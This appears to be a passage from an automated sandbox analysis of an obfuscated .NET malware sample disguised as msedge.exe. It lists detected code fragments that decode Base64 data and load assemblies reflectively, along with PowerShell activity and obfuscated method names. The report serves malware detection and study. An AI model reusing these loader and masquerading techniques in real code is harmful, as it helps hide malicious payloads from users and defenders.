                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: 2.2.YgJ5inWPQO.exe.1d8a98e00a0.1.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                      Source: 2.2.YgJ5inWPQO.exe.1d8a98e00a0.1.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: VCRUNTIME140.dll.0.dr Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
                      Source: VCRUNTIME140.dll.0.dr Static PE information: section name: fothk
                      Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
                      Source: libcrypto-3.dll.0.dr Static PE information: section name: .00cfg
                      Source: python313.dll.0.dr Static PE information: section name: PyRuntim
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe Code function: 14_2_00007FFB498D2830 push ss; retf 14_2_00007FFB498DD837
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe Code function: 14_2_00007FFB498DA272 push ebx; retf 14_2_00007FFB498DA282
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe Code function: 14_2_00007FFB498C00BD pushad ; iretd 14_2_00007FFB498C00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFB497AD2A5 pushad ; iretd 20_2_00007FFB497AD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFB498C0952 push E959E5D0h; ret 20_2_00007FFB498C09C9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFB499976B6 push eax; ret 20_2_00007FFB499976D1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFB49992316 push 8B485F92h; iretd 20_2_00007FFB4999231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00007FFB4978D2A5 pushad ; iretd 27_2_00007FFB4978D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00007FFB498AC2C5 push ebx; iretd 27_2_00007FFB498AC2DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00007FFB49972316 push 8B485F94h; iretd 27_2_00007FFB4997231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 30_2_00007FFB4979D2A5 pushad ; iretd 30_2_00007FFB4979D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 30_2_00007FFB49987BFC push esp; iretd 30_2_00007FFB49987BFD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 30_2_00007FFB49982316 push 8B485F93h; iretd 30_2_00007FFB4998231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFB4978D2A5 pushad ; iretd 34_2_00007FFB4978D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFB49972316 push 8B485F94h; iretd 34_2_00007FFB4997231B
                      Source: msedge.exe.2.dr, 7l8EMvCZIQ2S6SCCgLjAUPV321xi9u2lG1TN5rcaiwq3jJZsmcdPp6QQZ4JfjN1Ag3iJhVbD2EMEm6iDuAiqQJORTJjKZlvtxR.csHigh entropy of concatenated method names: 'yLkA7Q6Kyqbf7JvABMuLJlGQe8lXA3ZPaGTzSUgq5myXaKtbYNc1F1R2xNV3eEzAlxyWWPMje4ZJsYtZpjLrVxKSGiuKErxdsn', 'ay9gvxX2nAR4xs0fZMBlmfecS4kM3MYsQmE9WDNd22SUfcckNmdsM5odOJqICEhy0b09DJsHYNjHvYltdHpSlt54GW6CuF8WAB', '_5YcIPTAaHluO4yNnj1vfBwQeeNmkoH8nMKzc2miNJESRx3WzOFaUm6KbQZxYDPbWr6QC3mZ817QCFOLaIzodRe6n9dZY62II0e', 'iM7MRft4gonQkd1M5Ag3RkMRz', 'HtI7DCm94hvxdFS3tcCRfjP0B', '_1eROfC4OTQkqiqLLg1UaTC7I3', '_86uYvfHoynkvtwP3LC7jNqL5l', '_6H35GECqxSX36OMFsHk9b0JI3', 'ivyvL9KeLSbyFYPNQl8bu5OCL', 'f6NSBWBAVbEsBxXbShNY8sAKQ'
                      Source: msedge.exe.2.dr, 0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.csHigh entropy of concatenated method names: 'yh97aflW3Y6Oc6EMOjb8igXrFuDjxnyJ0g4ZgemCPK25C6B0QkVCKz6gXmErE8EFiJzZ0N8KwuSddeiSIei', 'rmFFrLm9tg4sqGbwwV6wTFNfANZqh2jmSbI2T7KIFdXYBS7NZ76YUuWieUDCGxfu2uFIFSqI7qJbnil5WPx', 'JeYM41efdgM3xEeo83K8abrLd3xT9Zka5PUghZeANQraQFGzVzGwZlLjFHekTIjUpXPGUzOHAaa2hss6Ro7', 'jl27VKGuPbY6Vv50dLRBg9PHurocMlRz5UXO3avvvO7g7hGGaRW2xiPqgqgoCagbW6eFOJmnmTsQ9BFvKki'
                      Source: msedge.exe.2.dr, Aa9DO6wWMfkvbFA2SI9y58lSPZNgXOk0nlHGYdR5geCe6PSZ.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rCym4pGH0HfiWYMDkatZ4jDgtzxGrNwDeTdN4AGeR6ampuEWA1uJoNCe2HQqeMQKzjbNL0umb0ads4lHF7iR7rf0fDHQ6fYZv0', 'JnGcaPLk9cEe8ZtNdeKwV2NmbQK9NjtMQBcABUh7rA69kc63UMML6mEBixCWcCQlpNcgcRT7vTtcN98dMooYPV7JU7l3n98uBC', 'za8iXzabtj3LOTES9ZUroK4B7VbEXqHLFSddlabg9rmqfzeJxAwwU5fprAWHSYoqtTdLDLf5wWhhI3vRLVOpCx10SD7ZtcrfHV', 'AxG7nVOUs64ifgghu403q6JlFTkHiMAxg7JlRR7C6BUFS8ABLZGfAPgje1VNGD0I4tt1OhX6t7jmBvnVXZc'
                      Source: msedge.exe.2.dr, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csHigh entropy of concatenated method names: 'QxFWgAZfropbgmTO2hlzNsLzVeiewHGUSf6EW3Ffo7mQohnn3sFEtKyn58ywLDXZp', 'E7gTS6aZOBUjrnjWkRovirs5GQMP6vDANNiXNCsHM9XKpdpCSi9ySH4h7LWHV17ED', '_5GEPL5zXkhE1GjOHoZ9z63pfIV85JvFLlvj9gixiODSRnurpPHLDzOHVFbEEno2RavWF3fIZEn3SxJ98u2njqTFUddgst4LRcj', 'ltLJ4u6QrOFoSub4MAJVSYuaDhMwbXPSGDBGMy2ZbRxsYrLl16uPhdnTP7agf6Hm1vk8YnSCaVCsMp7KpjatND9rWTQO8huXyA', '_11e6MCzhNjt9fkdjoEPblcMuf6aFCMPVhhBUVA7Yqvey60iT4Z9rQiGfXtUSY21UXDoLmcm6FQzqjjhT443rzH1lHfGBRaJtHO', 'UZ4u6YhLiNmOQFhZub8hA81xnXuvc2Ctomxn0gpupTthP7ZmB0HUwan956IvJfW7zg9wrIOHlikLJ3FTJAQFthekemjXyhQSnf', 'DwGMdcgm3qHTRgmWo7sPJ5n0mnmEW2Fbc5oKL6LmvH2Z8Na3KvToLZPvhJoAOw3kTLi0O0Ocuxf3rowAAP7q2aqOBC16LpYOTX', 'zgdeUfZxN9ppsoOeFNMwd0uvrXzumzUexYDqje8VufRmYDVO4UqBdeQkKXZkwRFlpgusfVbxqelmm0C6pEM5PlxKogt9n60CKN', 'vmcqjfch5uiAiPz2xYdQXmk3uqbYmRKT6dK6XpFJuqu89T7ov0Xj6xsWrH2HieBkeuyBpMScrGzeRWxPDV4NyMWMaDCOXmtZWS', 'psQx6sOJNixtwH4cosuDJVM8w3hj7T7nEmPV7UZ3P0QeICadwisrC4VZPDfXPAwqXopYgZttuwQpzBkWaQ9QBphkKlg1T2YCYC'
                      Source: msedge.exe.2.dr, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.csHigh entropy of concatenated method names: 'E7pAEoTZL9Spl2tY5dP9it8wxhZikXrxarMTkvT3bAO1JmNjM4DEjCrAFEf4C84Hc', 'sK1EMIEWy94QUVp8dt4NMb7nE', 'Bq3KY2TNlgepk2nYwWvgaeox4', 'ZATUsFwMG4tcqp3gKEA66w1O0', 'gqFJHjU2OILeYa5BRaqNA1D5k'
                      Source: msedge.exe.2.dr, RCU77fvzQI1bW3Vpo5QsIuEOnvacINkd41Sdukon4zQhdO3pwSwv0DKGBQDlkhLcC.csHigh entropy of concatenated method names: '_3S6hTXFysXlTNpxkpMjvWho3Xij3a1thIBgoyfGVtVa8vLSxdMJ4mTU9fHTeTpyaT', 'SH8BPXlVdqfTpfr0dXzAedp0Owyt8vQ5aQMzLkLDknEZIyP3wSWkTb4T9OOH6Rmwt', 'ujmHtkgyBcc340ZUYJd4ZwSHR9s75HBDcR02joVkumogehguuKmJcNwp2ARZ7Y2eU', '_8uLtrjXyCbOf5PZIQ3NOJ4dW6qSMOwuWamF2lDNy5dLn7CpRI4gwrgv5yrFxfx0cG', 'WNpZKzxqLOd7RnJuNXtrbOscx', 'j0O4pInvmClZbk6eGgGhDPkt1', '_27UGHbqGtAnPYozHgin2IxY2o', 'mP1PQHbMcqYgF7rcX92WxSnc7', 'UuSZA9yx6NwCF7bdQBlSE92eY', 'gV9BDwFy83190WOT9KtIpLVbQ'
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.csHigh entropy of concatenated method names: 'lV8yfxnNOUZBrm7CCVAOCkMBat7ri85PfdsuSOkvPZ6T1pNFM5pGl9OqquNozdUuZRnBAVVMyRaaAMEB', 'Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c', 'pMFZ3PfvjSoGzkxKDTIiEVsgD2oSzxmwy9iQcZIMjWaqwi23XuiTTKhoEu57SkzeNCkbcY2b8FxO5Mvv', 'NH7YFiUOc5O0NSPvuPKD60ETIJxA3xnxfVXgRvMOuDvL2ZGrLviNQ6KOb50AX6b8G4oMPQm6QcuJNFxc', 'XqsUtRgXgobAukbBF3YrZRWuvN7k9mQQ4UTQuwGRKzndvPcxpUcoFtGYOFhERsAzBV0sYIi73FysSCpP', 'ehmlzl9HRbOhC72a5QblVNPKttoeTJGt58GLWCcJwFc9tIA8JMLTR7cC8fo2z59e5Elbdoq3HBIm3JBF', 'cVa88cKP4KxJbWe1wHxvup0fb40DrVPdG6MU4DVPRDtMslX2XHJVQLch5LdVStxVr0K7OWr7ZAvma7g0', '_6n7p7xcfkpxVJHGWtOAgEauvhKq6iFar1EAuBxNmilpE0I6s4OTNZGJI6olsxtYtouxQOyuB1NLvYxsM', 'gdyqhq6UGMGDaSA4E3FKviLXlri68bwhigKwBd09U3mJhDdd8EFiyXjYk7v0Me4p6', 'qBmNnXvTbBv0CeX2VcO6Mx2b2hi1FMYkpC0aLANmj0fjIVVdNBTGzIXF4qZZQC6is'
                      Source: msedge.exe.2.dr, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csHigh entropy of concatenated method names: 'qdmDYl4SL5ToIVCygypSkfUIDKPjPBMcg2pWQW1zo5JM2XOuiAwYIwNyAwohiYTUHH7uBG2P6URZDpkm', 'pQuIZJe9VwWfwtXo1n1TM12UVqpO1F6n1SDK5IiQTd5al1uh8JfEfTNYDwRfQPZij33wLq0aUK20cOHm', 'yealjVgbGthaP5FKECWl8KU5CL3QtF9urObvSWHJpwUX0AVS2QILSBuOrVLFBBCV02Wd64qHl5rcj8jj', 'FxMirkENPExtEC31ZL6aSwVo77wVgbeSUnd6fAw4oyPrAkel0j9O2ZgTZqqMSqieMfewjincpK0Vnsyz', 'RvVB9Ejb26XJ1kquvFnq3aQ9DI4Clt6AkQ55Vb1JVjaKGicDYngQj48Lgk5uza6TrlBilvpG9rZbdpZr', 'ojqT7jfklN6efpZt4f9GOK8UlLQQYSyLsWsqLdh7pNleULztIfmvuRjvbiUL5hBghcJHTVixu9AvWaSB', 'LYESWLPlNRB0RjlPBmu0cNDGD3nxTEfomN5rdXs2kjJkJ0rChKYf9a5OY3zH2ws4i2hdhKGIxYwUhAxv', 'sPApCcjEzgyiG1RLXBGyRbJDlQhSTnsCE8FYdrOIqFff4GpLFG35DTBjOoiBOIyRJbopCIzMXppXzf9z', '_4UeQiiQhn5nUGmsfOBWU2l6MQmAdJGc1zZCtsJ3WEBsztv7nnRLNlASY3wLrXt4So1oMMqbwc4Bs5g9l', '_9x2NFSoKL9vLpyXL1ktRXKL7SG847SNgRcdPtdPR8Om2cVboTqKHs6XMueB4gqshuhF7Aia8hNhQel9u'
                      Source: msedge.exe.2.dr, kYTFTR8V1K5OKHLJMdR9YLHeADSXXhtlG4Iwp3C4PI51lKEwaKDsnQlE3p7TC5FakkF3rYArzaBF5kPl.csHigh entropy of concatenated method names: 'BVqUoib0qQQlOkJEpWqM9D6mhr8SUDEpFDtzydSqh2w5Oo3DHVMV9mx7q1h0P8J55Ykz6w58o4H7LEC7', 'c31mxOeqgNLubMT2h5AST0IHdPAgEFgZAXyQ8RyaqvvyD0m6iwyKnYPQgsEHgKq4sclbIoCq9ekKmJx5', 'PzZFwBQ0Wo3sWYN9lbVpUjs00MTFAMgL3C6c1M62OH6qp0HyaCykdkRtcktS1lpPGIadK151yf9ll5kP', 'iZ1VpmKAxUZ5MEy03TNnL0O13IynehkTVOmUnOQihopeuYCgPofGAcz3cEjJz62CyozF9AxaBx6FYwVJ', 'k3ndOXrYkQH9liWl9ILv5rTWikaKMUactCNvyGmIoxN6HqIFj24TozibWBtvio1FK5CL9GyeJ8COXdao', 'h4Jxq053KZd14zLY6MGQRcCVHWhC1oUNZ1Dwkh06DyfCoK8BZ41STUKuTNZaIiyOtRLDSnWeyxeuHyx5', 'yE0qpSUDJwJzUcoWRb7RduQfTW8VbkCDON7wafJczZbOxyFxEsahclUEguvWpBZvySnlLbAFbOAaG43o', '_3eZb4qgo9XlZFyEEP6kniOLHeIGoVAwPpp0QNW1Oz6Rdmg32BWCa24cRVDPSwcscPU0AQeTeSoGdorXY', 'VzfEhaqpx7WuM6mKRysSvH9CnwJfaQgLrwFjSXr7Dd8MvmhLq5ucsvUZNIRSyYcbUor0nwBAb5adVWJA', 'Hcxmwgcfvb0Bkd2qCZPrYJ9y8zsB3wzwWROBql1Bs7u2bWnTbpVOqKraOWNdG3emjOJzdqAZG19OKmsU'
